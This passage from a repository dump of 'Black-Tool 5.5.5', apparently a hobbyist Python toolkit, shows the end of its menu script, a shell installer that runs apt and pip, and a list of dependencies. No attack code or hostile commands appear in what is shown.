https://instagram.com/sina.coder{Fore.WHITE}") 593 | time.sleep(0.5) 594 | time.sleep(2) 595 | input("Press Enter...") 596 | self.main_menu() 597 | def banner(self): 598 | banner_art = text2art("Black Tool","tarty1") 599 | print(banner_art) 600 | print(f"{Fore.RED}Black-Tool 5.5.5 Sina Coder{Fore.WHITE}") 601 | def clear(self): 602 | if system() == "Linux" or system() == "Darwin": 603 | os.system("clear") 604 | else: 605 | os.system("cls") 606 | def exit_blacktool(self): 607 | self.clear() 608 | print(Back.GREEN + Fore.BLACK + "Thanks For Using :)") 609 | Style.RESET_ALL 610 | sys.exit() 611 | if __name__ == "__main__": 612 | 613 | try: 614 | BlackTool = Black_Tool() 615 | BlackTool.main_menu() 616 | except KeyboardInterrupt: 617 | print("Ctrl + C") 618 | print("Exit") 619 | sys.exit() 620 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/env bash 2 | # Black-Tool v5.5.5 (New) 3 | # Black-Tool Installing File 4 | # 5 | # Github: https://github.com/mrprogrammer2938 6 | # Instagram: https://instagram.com/sina.coder 7 | # 8 | clear 9 | echo "" 10 | echo "█▄▄ █░░ ▄▀█ █▀▀ █▄▀ ▄▄ ▀█▀ █▀█ █▀█ █░░ v5.5.5" 11 | echo "█▄█ █▄▄ █▀█ █▄▄ █░█ ░░ ░█░ █▄█ █▄█ █▄▄" 12 | echo "" 13 | echo "Black-Tool Installing" 14 | chmod -x hack 15 | sudo apt install python 16 | sudo apt install python3 17 | python -m pip install -r requirements.txt 18 | echo "Finish...!" 19 | echo "please Enter python hack" 20 | exit 21 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pyttsx3 2 | requests 3 | colorama 4 | cryptography 5 | pybluez 6 | googlesearch-python 7 | ipapi 8 | playsound 9 | deep_translator 10 | tk-tools 11 | tkinterweb 12 | ttkbootstrap 13 | PIL 14 | PyQt5 15 | pyqt5-tools 16 | --------------------------------------------------------------------------------